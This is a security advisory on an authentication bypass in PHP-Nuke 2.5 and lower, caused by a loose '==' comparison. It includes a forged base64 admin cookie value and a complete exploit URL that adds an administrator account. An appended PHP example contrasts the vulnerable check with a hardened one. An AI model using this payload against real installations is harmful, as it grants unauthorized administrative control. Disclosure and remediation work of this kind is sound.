A security vulnerability in PHP-Nuke, a news site administration package, allows a remote attacker to gain administrative access to the application. PHP-Nuke is open source and can be freely downloaded at: http://phpnuke.org
Credit:
This information was provided by Fabian Clone.
Vulnerable systems:
PHP-Nuke 2.5 or lower
Let's take a look at how PHP-Nuke authenticates administrative accounts.
In auth.inc.php3, line 31:
$admintest = 0;
if(isset($admin)) {
    if(!IsSet($mainfile)) { include("mainfile.php3"); }
    // $admin arrives from the request (cookie, GET or POST) as a global variable
    $admin = base64_decode($admin);
    $admin = explode(":", $admin);
    $aid = "$admin[0]";
    $pwd = "$admin[1]";
    dbconnect();
    $result=mysql_query("select pwd from authors where aid='$aid'");
    if(!$result) {
        echo "Selection from database failed!";
        exit;
    } else {
        // mysql_fetch_row() returns FALSE when the query matched no row
        list($pass)=mysql_fetch_row($result);
        if($pass == $pwd) {   // loose comparison: FALSE == "" evaluates to true
            $admintest = 1;
        }
    }
}
Here some checks are done on the $admin value. Since any variable, whether from a cookie or a form (GET/POST), is automatically made global to the script by PHP, we can supply our own $admin value in the URL. If $pwd (an element of that "scrambled" $admin) does not match the value from the fetched row, authentication fails ($admintest = 0); otherwise we are able to access any function in admin.php3. Sounds normal, until you read the following exploit.
Exploit:
The theory is simply to make $pass == $pwd. As we can see, the $pass value returned by mysql_fetch_row() could be anything, or it could be FALSE if there are no more rows. So how about making $pwd (a string) and $pass (a boolean) both false? Yep, that satisfies the condition. The expression "if($pass == $pwd)" compares only values, NOT types. So setting $pwd = "" (empty) is EQUAL (though not identical) to the FALSE value of $pass.
The next part is even simpler. Putting any string NOT listed in the authors table into $aid will do for us: mysql_query() still returns a TRUE result (the query succeeds but matches nothing), so mysql_fetch_row() returns FALSE.
For example, crafting our $admin value:
$aid = "blabla"; $pwd = "";
$admin = base64_encode("$aid:$pwd");
This gives us "YmxhYmxhOg==". Using this value, we are now able to access all functions in admin.php3. The following URL adds the account "godbless:indonesia" to the authors database:
http://www.example.com/admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me
Looking at the available options, the administrator can edit users, articles, topics, banners, authors, etc.
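The loose-comparison flaw described above, next to a corrected check, as an added PHP example that is not part of this advisory or of PHP-Nuke's own code. It replaces the MySQL query with a constructed in-memory authors array so it runs offline, and the function names are hypothetical.

```php
<?php
// Constructed sample data standing in for the `authors` table (aid => pwd).
// PHP-Nuke 2.5 stored and compared the password in plain form, so the
// stored value here is the plain password as well.
$authors = ['admin' => 'sup3rs3cret'];

// Models auth.inc.php3: a lookup that returns FALSE when no row matched
// (like mysql_fetch_row()), followed by the loose `==` comparison.
function vulnerableAdminTest(array $authors, string $adminValue): bool
{
    $parts = explode(':', base64_decode($adminValue), 2) + [1 => ''];
    [$aid, $pwd] = $parts;
    $pass = $authors[$aid] ?? false;   // FALSE plays the role of "no rows"
    return $pass == $pwd;              // FALSE == "" is true under loose comparison
}

// Hardened check: reject malformed input, treat a missing author as an
// explicit failure, and compare with hash_equals() (strict, constant-time).
function hardenedAdminTest(array $authors, string $adminValue): bool
{
    $decoded = base64_decode($adminValue, true);   // strict decoding
    if ($decoded === false) {
        return false;
    }
    $parts = explode(':', $decoded, 2);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return false;
    }
    [$aid, $pwd] = $parts;
    if (!array_key_exists($aid, $authors)) {
        return false;                  // no row: never fall through to a compare
    }
    return hash_equals($authors[$aid], $pwd);
}

// The forged value from the advisory: unknown author, empty password.
$forged = base64_encode('blabla:');
$valid  = base64_encode('admin:sup3rs3cret');

var_dump(vulnerableAdminTest($authors, $forged));
var_dump(hardenedAdminTest($authors, $forged));
var_dump(hardenedAdminTest($authors, $valid));
```

With passwords stored as hashes rather than plain text, the final comparison in hardenedAdminTest() would be password_verify($pwd, $authors[$aid]) instead of hash_equals().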